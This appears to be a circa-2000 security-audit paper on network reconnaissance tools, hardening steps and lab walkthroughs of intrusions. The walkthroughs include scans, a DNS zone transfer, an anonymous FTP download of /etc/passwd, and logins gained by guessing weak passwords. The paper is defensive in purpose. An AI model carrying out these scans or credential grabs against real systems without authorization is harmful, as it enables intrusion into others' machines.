- dig          DNS information gathering tool. Very useful.
- whois        InterNIC database lookup program.
- snmpwalk     Gathers network information using the SNMP protocol.
- traceroute   Shows the packet path to the target host.
- nslookup     Converts an IP address to a canonical name and vice versa.
- mail bounce  Use a bogus recipient to gain information on a target host.
-
-
- Tool packages
-
- Tool     Description
- netgrep  Netgrep scans an ip range for one specific port.
- sscan    Scans for multiple vulnerabilities and also uses host gathering
-          techniques.
- nmap     Stealth port scanner with stack fingerprinting ability and source
-          spoofing techniques; does xmas, syn, fin and UDP scans.
- mscan    Older version of sscan, still kind of fun.
- NSS      Narrow Security Scanner. It's a perl script, which makes it nice and
-          portable. Searches for common vulnerabilities like msadc.pl and
-          showcode.asp. I found it works very well.
- CIS      Cerberus Internet Scanner.
- nessus   Nessus is a security auditing program that can scan an entire class A
-          subnet for multiple DoS attacks, exploits and mis-configurations. It
-          runs in two parts, a client/server application where all scanning
-          functions are done by the server, which is controlled by the client.
-          Nessus scans for many modern security issues such as Windows
-          vulnerabilities and various Unix exploits.
-
-
- Common services.
-
-
- Service           Description
- SSH               Secure Shell, an interactive encrypted shell session like
-                   telnet.
- NFS               Network File System, allows file systems to be exported
-                   across the network and mounted on a remote system.
- rlogin/rsh/rexec  Remote login / remote shell / remote execute.
- finger            Displays remote user information and current users logged
-                   in.
- FTP               File Transfer Protocol, transfers binary and ASCII files
-                   between hosts.
- sendmail          Mail delivery system between hosts.
- WWW               World Wide Web, a.k.a. Hyper Text Transport Protocol. You
-                   are looking at it now.
- netbios           Protocol that allows MS networked machines to share
-                   resources.
- DNS               Domain Name Service, used to resolve IP addresses to
-                   canonical names and vice versa.
- telnet            Start an interactive shell on a remote host using the
-                   TELNET protocol.
- QPOP              Pop your email off the server to read off-line.
- portmap           Maps Sun RPC services to their respective ports (UDP).
-
-
- III. Information
-
- Just about any information on a target host is useful in creating a database
- of applicable vulnerabilities. What we are attempting to do is determine what
- services the target offers and whether any of them can be exploited to leverage
- access to the system. For example, knowing the version of the OS that your
- target host is using can help you find information on exploits or bugs
- specific to that OS. By limiting what services we are running and what
- information is available, we decrease the window of opportunity for the
- cracker.
-
- IV. Information Gathering (Noisy)
-
- Just about all of the utilities mentioned above will disclose information
- about the target host. You can piece together parts of a target's network
- topology by bouncing a bad email off of the server. This can disclose
- whether the mail is relayed internally on another host and the type and
- version of software used to handle internet/exchanged mail. Using
- traceroute you can discover network equipment like routers and switches.
- A port scan will give you a list of services available on the target host.
- These are all common methods adopted by system crackers to gain access to
- their target. There are many packages out there that automate this process
- of poking, gathering, logging and sorting. For example, sscan is a utility
- for crackers and system admins alike to gather information on target
- machines. It scans the host or network for various security problems
- and checks for vulnerabilities. Nessus is another package that scans a
- network for problems; it also checks for DoS attacks and poorly
- configured network equipment like routers and manageable hubs. Just
- grabbing banners with telnet or netcat will divulge important information
- on your target. All of this is fine, but what about more sinister methods
- of information gathering? What about information you meant to provide
- being used against you? What about the stuff your logs don't catch?
-
- V. Information Gathering (Stealth)
-
- This method uses the common public ports and specially designed utilities to
- gather host, user and system information. When I talk about common public ports
- I am referring to ports that are expected to be accessed by the everyday
- internet user (53*, 80, 25, 21*). These services can be queried with little or
- no suspicion from the administrator. Some ports have varying degrees of
- noticeability; for example, if you do a zone transfer of the target system's
- DNS records, this may set off alarms that suspicious activity is at hand,
- perhaps more so than an anonymous ftp connection, depending on the site and
- the administrator's awareness.
-
- Stealth utilities like nmap are designed to take advantage of the TCP
- protocol in order to circumvent logging. This can also be combined with
- protocols that are less common, like SNMP. An SNMP query can yield information
- like OS type, uptime and machine name*. Quite a few vendors enable SNMP by
- default and most administrators are unaware of the dangers. More common
- services, for example anonymous ftp, can be mined for information. It is
- amazing what one can find dumped in /pub on some sites: password files, old
- sensitive emails, product information, system information and user lists. I
- once found a Netscape Enterprise digital certificate for the site I was
- auditing sitting in /pub waiting for its owner to pick it up*. In cases like
- this the attacker simply downloads every readable file hoping to find
- something interesting.
-
- Probably the number one reason driving system admins to place closed
- networks on to the internet is the desire to implement a web site. In some
- cases the mad dash to get a web page up shoves proper security techniques
- aside. The old saying "don't put all of your eggs in one basket" applies to
- security as well; anyway, back to the mad dash. This usually means that the
- hosting company will go to great lengths to provide a myriad of information to
- the WWW community. This can be a bad thing, however: sometimes more
- information is too much information.
-
- VI. Procedures
-
- This is an overview of how to use each package. For more information
- see the man pages or the package documentation.
-
-
-
- Package     Description
-
- brscan      Broadscan is very simple to use; I plan to add more options to it
-             later. The following will search the given ip range for port 80.
-
-             $ ./brscan 192.168.2.1 192.168.3.254 80
-
- smbclient   List all shares on WWW; type smbclient for more information on
-             options and usage.
-
-             $lab-1> smbclient -L WWW -I 192.168.2.3
-
- whois       $ whois whitehouse.gov@whois.arin.net
-
- traceroute  $ traceroute www.freebsd.org
-
- dig         $ dig maine.edu @192.168.172.123 axfr
-
- snmpwalk    Use snmpwalk to query the snmp server on a remote host. This
-             protocol is probably less commonly thought of as an information
-             gathering tool. It is a powerful one, however.
-
-             $lab-1> snmpwalk 192.168.2.3 public system
-
- nss         Narrow Security Scanner. hostfiles is a file containing the list
-             of ip addresses that you are scanning.
-
-             ./scanner hostfiles vulnerable-log
-
- Nessus      Nessus is a security auditing program that can scan an entire
-             class A subnet for multiple DoS attacks, exploits and
-             mis-configurations. It runs in two parts, a client/server
-             application where all scanning functions are done by the server,
-             which is controlled by the client. Nessus scans for many modern
-             security issues such as Windows vulnerabilities and various Unix
-             exploits. The commands are as follows:
-
-             # ./nessusd &
-             # ./nessus &
-
-             You must issue an xhost command on the connecting host.
-
- rpcinfo     Display information on remote procedures being offered.
-
-             $ rpcinfo -p hostname
-
- showmount   Display information on remote NFS mounts.
-
-             $ showmount -e hostname
-
- mail bounce An attempt to gather information on a remote host by bouncing a
-             bad email off of the server and examining the header information.
-
-             $ mail -s "test" jkhshjkd@hostname.com
-             test message please ignore
-             .
-
-
- nmap        This is a network mapping package that is capable of stealth
-             scanning and OS fingerprinting. I will attempt to explain these
-             concepts to those of you who are unfamiliar with them.
-
-             Stealth scanning: A normal TCP connection consists of a 3-way
-             handshake in order to connect to the other host; this software
-             doesn't complete that 3-way handshake, in order to hide its
-             attempts at information gathering.
-
-             OS fingerprinting: Mangled packets are sent in different sequences
-             at the target host and, depending on the target host's reaction,
-             a guess is made as to what OS that host is running, based on a
-             table of known reactions.
-
-             # ./nmap -O -sS 192.168.0.*
-
-
- sscan       Sscan is a rewrite of mscan. They are vulnerability scanning tools
-             that are capable of scanning a large block of ip addresses
-             searching for known vulnerabilities like Qpop, IMAP, DNS,
-             cgi-bin/phf etc.
-
-             # ./sscan -o 192.168.3.28
-
-
- VII. Locking down the house
-
- Shut down all unneeded services.
-
- Remove all unwanted packages. Web server? You don't need X, GCC, Sendmail
- etc. Mail server? You don't need apache, GNOME, GCC etc.
-
- Look through vulnerability archives like packetstorm for existing exploits.
- Search for your OS/Software/Services/Packages etc. Patch accordingly.
-
- Audit your setuid binaries:
-
-     find / -perm -4000 > setuid-DATESTAMP
-
- Store this off-line somewhere.
-
- Install tripwire, but don't rely on this alone.
-
- Watch your logs; keep a close eye on the system as a whole.
-
- Mount certain partitions read-only, like /usr. Under linux you can do
-
-     mount -o remount,ro /dev/hda2 /usr
-
- See the man page for more details.
-
- Join email lists like CERT, CIAC, Bugtraq and lists specific to your vendors.
-
- Limit local accounts to root and a manager account.
-
- Passwords: really secure passwords. Something you can pronounce so you can
- remember it, but with no real words; minimum of 7 characters. Rudi^b@1 -->>>
- Rudy Carrot bat one.
-
- Limit services; don't run tons of plugs and proxies on your firewall. It
- soon becomes a proxy server once you add that AOL IM proxy, Real Audio and
- NNTP.
-
- Use filtering: either tcp wrappers, or, on linux and freeBSD, ipchains and
- ipfw to drop unwanted packets.
-
- Try to break into your own network. BUT make sure you have permission in
- writing, and notify networking personnel and management. This could even
- cause them to secure the boxes beforehand, which will not give an accurate
- security assessment, but at least it moved you in the right direction.
-
- Always maintain patch levels and version levels of your services, like bind
- and sendmail.
-
- Only allow zone transfers and queries by your network and its trusted hosts
- (i.e. secondary DNS).
-
- VIII. Interpretation and Sorting
-
- This section is still being completed. In this section I have examples of
- output from various packages and I will point out significant tidbits of
- information. These are actual logs of what information I was able to find on
- some test systems. My comments are in red.
-
-
- # ./nmap -sT 192.168.18.6
-
- Starting nmap V. 2.3BETA5 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
- Interesting ports on 192.168.18.6
- Port    State     Protocol  Service
- 7       filtered  tcp       echo
- 19      filtered  tcp       chargen
- 25      open      tcp       smtp
- 111     open      tcp       sunrpc
- 800     open      tcp       mdbs_daemon
- 844     open      tcp       unknown
- 1030    open      tcp       iad1
- 1521    open      tcp       ncube-lm
- 2001    open      tcp       dc
- 12345   filtered  tcp       NetBus
- 12346   filtered  tcp       NetBus
-
- Nmap run completed -- 1 IP address (1 host up) scanned in 13 seconds
-
-
- Looks like a database (port 800), so why run all of these other services? If
- you don't need them, shut them down.
-
-
- $> snmpwalk 192.168.18.6 public system
-
- Timeout: No Response from 192.168.18.6
-
- No snmp daemons running.
-
-
- [bewhaw ~] $ rpcinfo -p 192.168.18.6
-
-    program vers proto   port  service
-     100000    3   udp    111  rpcbind
-     100000    2   udp    111  rpcbind
-     100000    3   tcp    111  rpcbind
-     100000    2   tcp    111  rpcbind
-     100024    1   udp    842  status
-     100024    1   tcp    844  status
-     100021    1   udp   2049  nlockmgr
-     100021    3   udp   2049  nlockmgr
-     100021    4   udp   2049  nlockmgr
-     391004    1   tcp   1025
-     391004    1   udp   1025
-     100001    1   udp   1026  rstatd
-     100001    2   udp   1026  rstatd
-     100001    3   udp   1026  rstatd
-     100008    1   udp   1027  walld
-     100002    1   udp   1028  rusersd
-     100011    1   udp   1029  rquotad
-     100012    1   udp   1030  sprayd
-     100026    1   udp   1031  bootparam
-     391011    1   tcp   1026
-     391002    1   tcp   1027
-     100083    1   tcp   1028
-     100003    2   udp   2049  nfs
-     100003    3   udp   2049  nfs
-     150001    1   udp    797  pcnfsd
-     150001    2   udp    797  pcnfsd
-     150001    1   tcp    800  pcnfsd
-     150001    2   tcp    800  pcnfsd
-
-
- Hmm, let's check for NFS; I don't see mountd though.
-
- [brewhaw ~] lwcashd $ showmount -e 192.168.18.6
-
- showmount: 192.168.18.6: RPC: Program not registered
-
- Nope, no exported file systems. Fix: Again, shut down all unneeded services.
-
-
- [muffin ~] $ telnet 192.168.18.6 25
-
- Trying 192.168.18.6...
- Connected to 192.168.18.6.
- Escape character is '^]'.
- 220- mail Sendmail 950413.SGI.8.6.12/950213.SGI.AUTOCF ready at Tue, 7 Dec 1999 13:52:49 -0500
- 220 ESMTP spoken here
- vrfy root
- 250 Super-User <root@mail>
- expn root
- 250 Super-User <root@mail>
-
-
- Hmm, IRIX 6.2 I'd guess, as 8.6.12 is a pretty old sendmail. It is also running
- with vrfy and expn functional; they can be used to guess valid user accounts.
- Fix: Upgrade sendmail.
-
- Let's try another system; this time we will try to be sneaky.
-
- [pangea ]$ snmpwalk test-03 public system
-
- system.sysDescr.0 = Sun SNMP Agent, Ultra-Enterprise
- system.sysObjectID.0 = OID: enterprises.42.2.1.1
- system.sysUpTime.0 = Timeticks: (13902714) 1 day, 14:37:07.14
- system.sysContact.0 = System administrator
- system.sysName.0 = test-03
- system.sysLocation.0 = System administrators office
- system.sysServices.0 = 72
-
-
- #./nmap -sF 192.168.1.1
-
-
-
- This SNMP call was successful; sometimes we can discover the OS version and
- patch level this way. Fix: Disable SNMP by removing the snmp daemon from your
- startup scripts.
-
- [pangea ~] lwcashd $ finger @192.168.7.21
- [192.168.7.21]
- connect: Connection refused
-
- Hmm, finger is not running, so we can't get a user list that way. Let's try
- another method.
-
- [pangea ~] lwcashd $ rpcinfo -p 192.168.7.21
-    program vers proto   port  service
-     100000    4   tcp    111  rpcbind
-     100000    3   tcp    111  rpcbind
-     100000    2   tcp    111  rpcbind
-     100000    4   udp    111  rpcbind
-     100000    3   udp    111  rpcbind
-     100000    2   udp    111  rpcbind
-     100002    1   udp  32770  rusersd
-     100002    2   udp  32770  rusersd
-     100021    1   udp  32776  nlockmgr
-     100021    2   udp  32776  nlockmgr
-     100021    3   udp  32776  nlockmgr
-     100021    4   udp  32776  nlockmgr
-     100021    1   tcp  32772  nlockmgr
-     100021    2   tcp  32772  nlockmgr
-     100021    3   tcp  32772  nlockmgr
-     100021    4   tcp  32772  nlockmgr
- 1342177279    3   tcp  35567
- 1342177279    1   tcp  35567
- 1342177280    3   tcp  36146
- 1342177280    1   tcp  36146
-
- Hmm, rusers is running; let's see what that gives us.
-
- [pangea ~] lwcashd $ rusers -l 192.168.7.21
- www       192.168.7.21:tty0      Jan 18 11:22    5:54
- www       192.168.7.21:tty0      Jan 18 15:09    5:54
-
-
- We now know of one login on our target, www, which sometimes has easy to guess
- passwords for web maintenance.
-
- If a service is vital to your server, be sure to get information on previous
- bugs and patches. Getting the latest version isn't always the answer, as new
- features might introduce new bugs; it's better to keep track of the latest
- modifications to the new version and upgrade accordingly. For example, if
- there are no known vulnerabilities and the latest version adds more bells and
- whistles, you might want to wait a while before upgrading. This way the
- software package has time to be poked and prodded by system administrators and
- security personnel.
-
- Enough dry reading already; let's see how much information we can gather on
- our target with these tools. Our target is a high school web server. The box is
- hosted by the school off of a state edu connection. The box is actually one of
- my lab machines that I configured in exactly the same way as the server I
- audited. All of the examples in this paper will be lab machines set up to
- depict examples as I have seen them in the wild.
-
- Nmap Scan: For usage see the tools section.
-
- [root@Diabolic nmap-2.3BETA6]# ./nmap -O -sX 192.168.15.19
-
- Starting nmap V. 2.3BETA6 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
- Interesting ports on dt065ndb.maine.rr.com (192.168.15.19):
-
- Port    State  Protocol  Service
- 23      open   tcp       telnet
- 25      open   tcp       smtp
- 80      open   tcp       http
-
- TCP Sequence Prediction: Class=truly random
-                          Difficulty=9999999 (Good luck!)
- Remote operating system guess: Linux 2.0.35-37
-
- Nmap run completed -- 1 IP address (1 host up) scanned in 4 seconds
-
- Our target host is running a web server and telnet for remote administration.
- They probably feel that the server is somewhat secure because they have shut
- down most of the services. The next step is to fire up a web browser and see
- what they have for site content. <screen dump?>
-
- What I am looking for is any information that will tell me what accounts exist
- on the target and whom they belong to. What I find is what I consider half of
- the password file, HTMLized and up for display: a contact page. I don't really
- know if the accounts on the contact page are local or aliases to a mail server
- internally. I assume it's all local accounts, as most school admins aren't
- ready to set up a split horizon DNS with a smart relaying sendmail
- configuration.
-
- The contact page is generally a list of email addresses for that site of about
- ten to fifteen teachers, staff and even the webmaster. I guess that the
- principal's secretary might be a good candidate for a password guessing attack
- and try the following.
-
- Trying 192.168.15.19...
- Connected to 192.168.15.19.
- Escape character is '^]'.
-
- Red Hat Linux release 5.2 (Apollo)
- Kernel 2.0.36 on an i486
- login: jsmith
- Password: jsmith<enter>
- [jsmith@dt065ndb jsmith]$
-
- Whoops, they are local accounts and poorly passworded, as I suspected. As nmap
- revealed, this is a linux box, Red Hat 5.2 to be specific, and it is trivial to
- locate an exploit to get root. At this stage the game is all over. With minimal
- information gathering, an nmap scan and web mining, we were able to gain access
- to our target. If they had mail handled elsewhere, and limited local accounts
- to root and one admin user with good passwords, this wouldn't have happened.
- (Entries in hosts.allow/deny wouldn't have hurt them either.)
-
- More electronic dumpster diving with ftp.
-
- [pangea /tmp] $ ftp 192.168.41.29
-
- Connected to zig.internal.net.
- 220 zig FTP server (UNIX(r) System V Release 4.0) ready.
- Name (zig.internal.net:security): anonymous
- 331 Guest login ok, send ident as password.
- Password:
- 230 Guest login ok, access restrictions apply.
- ftp> cd etc
- 250 CWD command successful.
- ftp> get passwd
- 200 PORT command successful.
- 150 ASCII data connection for passwd (192.168.12.2,33793) (523 bytes).
- 226 ASCII Transfer complete.
- local: passwd remote: passwd
- 538 bytes received in 0.0059 seconds (89 Kbytes/s)
-
- Ok, grabbing the password file isn't so stealthy. But I want to check to see if
- they screwed up at all.
-
- $> tail -n1 passwd
- ftpadm:x:1113:1000::/home/ftpadm:/bin/csh
-
- Yes, they have screwed up; this is possibly (if the passwd file is not out of
- date) a local user account with a valid shell.
-
- [muffin /tmp] $ ftp 192.168.41.29
-
- Connected to zig.internal.net.
- 220 zig FTP server (UNIX(r) System V Release 4.0) ready.
- Name (zig.internal.net:security): ftpadm
- 331 Password required for ftpadm.
- Password: (ftpadm1)
- 230 User ftpadm logged in.
- ftp>
-
- First try. Probably the second worst password you could have, besides ftpadm.
-
- Dangerous combinations
-
- SSH and NFS: if you are exporting a home directory to the world, which is a big
- no-no, an attacker can append their identity.pub file to your authorized_keys
- file. This will allow them to log in with their login password. You really
- shouldn't need to export a file system off of a system on the internet. I
- would move the NFS server into the internal network and share out the
- filesystem to a specific list of hosts or networks. Also, besides clamping down
- on NFS, add tcp wrappers to your SSH daemon; it can be run from inetd with
- sshd's -i option.
-
- WWW with telnet/ssh: be sure, if you list contacts and email addresses, that
- none of them reside locally on the web server. If they do, then you just gave
- out half of your password file. A list of contacts is a list of logins.
-
- An anonymous ftp site with writable directories and/or sensitive material.
- This becomes an electronic form of dumpster diving. Old emails, software
- packages, sensitive files etc.
-
- snmp and samba: snmp can be used to get the netbios/machine name. Then samba
- can be probed for shares.
-
- Sharing an uploadable ftp directory with a webserver: scripts can be uploaded
- and executed remotely through the webserver (PHP, ASP, PERL, SHTML etc.).
-
- Sorting / Organization
-
- Logs are normally kept in flat text files; this makes them easy to manage and
- sort. Depending on how savvy you are, you might want to create a database or
- store them in comma delimited format. I organize log files using the following
- directory structure:
-
- Network -----> Hostname -----> nmap_output
-                          -----> showmount -e output
-                          -----> snmpwalk_output
-                          ..etc..
-
-
- I suggest logging problems by network, OS, vulnerability, hostname.
-
- 192.168.0 ------> IRIX ------> open_lp_account ------> 192.168.0.23
-                                                         192.168.0.64
-                                                         192.168.0.203
-
- This way with each directory change you get more detail.
-
- X. Resources
-
- Web.
-
- Security mailing list and announcements: http://www.cert.org
- Massive security site, hosts bugtraq and other security forums:
- http://www.securityfocus.com
- Probably the biggest security archive out there: http://packetstorm.securify.com
- Underground news and information: http://www.hackernews.com
- A searchable index of RFCs, FAQs and electronic books: http://www.faqs.org/
- IBM Bookmanager Book server:
- http://www.s390.ibm.com:80/bookmgr-cgi/bookmgr.cmd/print?book=bk8p7001
- The nessus project (free network security scanning tool): http://www.nessus.org
- nmap OS detecting scanner: http://www.insecure.org
-
- Papers
-
- Holbrook, P. (1991). Site Security Handbook [Online]. Available:
- http://www.cis.ohio-state.edu/htbin/rfc/rfc1244.html [1997, December 20].
-
- Pethia, R. (1991). Guidelines for the Secure Operation of the Internet
- [Online]. Available: http://www.cis.ohio-state.edu/htbin/rfc/rfc1281.html
- [1997, December 20].
-
- Farmer, D. and Venema, W. (No Date). Improving the security of your site by
- breaking into it [Online]. Available:
- http://www.deter.com/unix/papers/improve_by_breakin.html [1998, January].
-
- Bellovin, S. M. (1993). Packets found on an internet [Online]. Available:
- http://www.deter.com/unix/papers/packets_found_bellovin.ps.gz [1998, January].
-
- Bacic, E. M. (No Date). UNIX & Security [Online]. Available:
- http://manitou.cse.dnd.ca/papers/Unix_Sec.html [1998, January].
-
- Smith, N. P. (1997). Stack Smashing Vulnerabilities in the UNIX operating
- system [Online]. Available:
- http://millcomm.com/~nate/machines/security/stack-smashing/ [1998, February].
-
- Fyodor (1998). Remote OS detection via TCP/IP Stack Finger Printing [Online].
- Available: http://www.insecure.org/nmap/nmap-fingerprinting-article.html
-